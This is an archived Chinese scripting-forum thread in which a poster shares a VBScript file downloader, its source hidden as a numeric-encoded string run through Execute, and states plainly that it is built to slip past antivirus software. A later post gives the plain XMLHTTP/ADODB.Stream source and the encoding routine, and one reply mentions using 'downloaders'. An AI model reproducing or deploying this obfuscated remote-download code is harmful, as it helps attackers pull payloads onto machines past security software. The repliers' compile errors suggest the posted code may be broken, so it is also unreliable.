批处理之家's Archiver

somebody 发表于 2007-12-31 00:07

真正能绕过杀软下载文件的VBS[原创加密版]

代码使用说明:
CMD下执行以下命令即可下载单个远程文件,测试环境:windows 2003 + Kaspersky 6.0
cscript //nologo encode.vbs "http://kimhoo.lin.googlepages.com/encode.jpg" "d:\a bc\somebody.jpg"

PS: 1. 无论是网络路径还是本地路径,只要路径里含有空格或特殊字符,就必须用双引号括起来,最好括起来可以保证不出错。
     2. 想看源代码,将 Execute Decode(str) 改为 Wscript.Echo Decode(str) 然后以同样方法运行。[code]Wscript.Sleep 1000
Mystr = Array(115,111,109,101,98,111,100,121)
for i=0 to Ubound(Mystr)
    author=author&Chr(Mystr(i))
next
Wscript.Echo vbCr
Wscript.Echo "  code by " & author
Wscript.Echo "  LastModified: 2007-12-30  22:00"
Wscript.Sleep 2000
Wscript.Echo vbCr
str1 = "      ╭━━╮╭━━╮╭╭━╮╭━━╮╭━━╮╭━━╮┏━━╮╭╮╭╮"
str4 = "      ╰━╮┃┃┃┃┃┃╭╮┃┃╭━╯┃╭╮╮┃┃┃┃┃┃┃┃?┃┃?"
str6 = "      ╰━━╯╰━━╯╰╯╰╯╰━━╯╰━━╯╰━━╯┗━━╯?╰╯?"
str3 = "      ┃╰━╮┃┃┃┃┃┃┃┃┃╰━╮┃╰╯╯┃┃┃┃┃┃┃┃╰╮╭╯"
str5 = "      ╭━╯┃┃╰╯┃┃┃┃┃┃╰━╮┃╰╯┃┃╰╯┃┃╰╯┃?┃┃?"
str2 = "      ┃╭━╯┃╭╮┃┃??┃┃╭━╯┃╭╮┃┃╭╮┃┃╭╮┃┃╰╯┃"
myArray = Array(str1,str2,str3,str4,str5,str6)
For each sign in myArray
    Wscript.Echo sign
Next
Wscript.Sleep 2000
str="370,1160,960,1130,300,1000,1030,1060,990,300,1000,1090,1120,300,980,1090,1170,1080,1060,1090,950,980,1030,1080,1010,300,
1170,1030,1140,1020,300,630,810,650,710,710,300,990,1080,970,1090,980,1030,1080,1010,300,1140,1090,300,950,1160,1090,1030,980
,300,950,1080,1140,1030,430,1160,1030,1120,1150,1130,370,1130,300,1030,1080,1140,990,1120,1120,1150,1100,1140,1030,1090,1080,
110,80,370,970,1090,980,990,300,960,1190,300,1130,1090,1070,990,960,1090,980,1190,110,80,370,1140,990,1130,1140,1030,1080,101
0,300,990,1080,1160,1030,1120,1090,1080,1070,990,1080,1140,560,300,850,1030,1080,980,1090,1170,1130,300,480,460,460,490,300,4
10,300,730,950,1130,1100,990,1120,1130,1050,1190,300,520,440,460,110,80,770,1080,300,670,1120,1120,1090,1120,300,800,990,1130
,1150,1070,990,300,760,990,1180,1140,110,80,660,1030,1070,300,1030,800,990,1070,1090,"
str=str&"1140,990,420,1030,740,1090,970,950,1060,110,80,1030,800,990,1070,1090,1140,990,300,590,300,740,650,950,1130,990,380,
850,810,970,1120,1030,1100,1140,440,630,1120,1010,1150,1070,990,1080,1140,1130,380,460,390,390,110,80,1030,740,1090,970,950,1
060,300,590,300,740,650,950,1130,990,380,850,810,970,1120,1030,1100,1140,440,630,1120,1010,1150,1070,990,1080,1140,1130,380,4
70,390,390,110,80,810,990,1140,300,780,1130,1090,1070,990,960,1090,980,1190,300,590,300,650,1120,990,950,1140,990,770,960,104
0,990,970,1140,380,320,750,1030,970,1120,1090,1130,1090,1000,1140,440,860,750,740,700,820,820,780,320,390,110,80,780,1130,109
0,1070,990,960,1090,980,1190,440,770,1100,990,1080,300,320,690,990,1140,320,420,1030,800,990,1070,1090,1140,990,420,460,110,8
0,780,1130,1090,1070,990,960,1090,980,1190,440,810,990,1080,980,380,390,110,80,810,990,"
str=str&"1140,300,690,1130,1090,1070,990,960,1090,980,1190,300,590,300,650,1120,990,950,1140,990,770,960,1040,990,970,1140,38
0,320,630,980,1090,980,960,440,810,1140,1120,990,950,1070,320,390,110,80,690,1130,1090,1070,990,960,1090,980,1190,440,750,109
0,980,990,300,590,300,490,110,80,690,1130,1090,1070,990,960,1090,980,1190,440,820,1190,1100,990,300,590,300,470,110,80,690,11
30,1090,1070,990,960,1090,980,1190,440,770,1100,990,1080,380,390,110,80,690,1130,1090,1070,990,960,1090,980,1190,440,850,1120
,1030,1140,990,380,780,1130,1090,1070,990,960,1090,980,1190,440,800,990,1130,1100,1090,1080,1130,990,640,1090,980,1190,390,11
0,80,690,1130,1090,1070,990,960,1090,980,1190,440,810,950,1160,990,820,1090,680,1030,1060,990,300,1030,740,1090,970,950,1060,
420,480,110"
Execute Decode(str)
Wscript.Echo Wscript.Arguments(0) &" 已经成功下载完毕并保存到 "& Wscript.Arguments(1)
Function Decode(code)
    iArray=Split(code,",")
    For i=0 To Ubound(iArray)-1
        trueStr=trueStr&Chr(iArray(i)/10+2)
    Next
    Decode=trueStr
End function[/code]ASCII加密过程:[code]str="115,111,109,101,98,111,100,121"   ' str 的内容是 somebody
Wscript.Echo Encode(str)
Function Encode(code)
    iArray=Split(code,",")
    For i=0 To ubound(iArray)-1
        s=(iArray(i)-2)*10
        p=p&s&","
    Next
    Encode=p
End function[/code]附: 字符串/ASCII 互转工具

youxi01 发表于 2007-12-31 00:21

年轻人,还是走"正道"啊,怎么总喜欢玩什么 病毒类\黑客类的东西呢?
呵呵

somebody 发表于 2007-12-31 14:31

靠~~汗死
什么病毒类...下载文件的VBS并不是什么病毒,只是调用了Microsoft.XMLHTTP
杀软爱管闲事喜欢插上一手,所以不加密是下不了东西的...[code]'vbs file for downloading with ASCII encoding to avoid anti-virus's interruption
'code by somebody
'testing environment: Windows 2003 + Kaspersky 6.0
On Error Resume Next
Dim iRemote,iLocal
iRemote = LCase(WScript.Arguments(0))
iLocal = LCase(WScript.Arguments(1))
Set Psomebody = CreateObject("Microsoft.XMLHTTP")
Psomebody.Open "Get",iRemote,0
Psomebody.Send()
Set Gsomebody = CreateObject("Adodb.Stream")
Gsomebody.Mode = 3
Gsomebody.Type = 1
Gsomebody.Open()
Gsomebody.Write(Psomebody.ResponseBody)
Gsomebody.SaveToFile iLocal,2[/code]这是源代码,你保存为VBS,开着杀软,运行得了才怪呢..~

[[i] 本帖最后由 somebody 于 2007-12-31 14:35 编辑 [/i]]

6589600 发表于 2008-1-26 15:51

是啊 ,开着杀软下东西就是慢,呵呵,好代码就像鱼,吃好了 香,吃不好会被噎死

葱头 发表于 2008-4-22 20:36

大家说~~用下载者来下载怎样~~嘿嘿~~~

Randy 发表于 2009-10-30 15:27

编译器错误:未结束的字符串常量  ??

idctop 发表于 2009-12-16 08:59

自己写完后把字符串转换成ASCII码就行了嘛。

diannaoleyuan 发表于 2010-12-2 12:31

汗。。。。不知道对我有没有用。。。顶个~~~~~

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.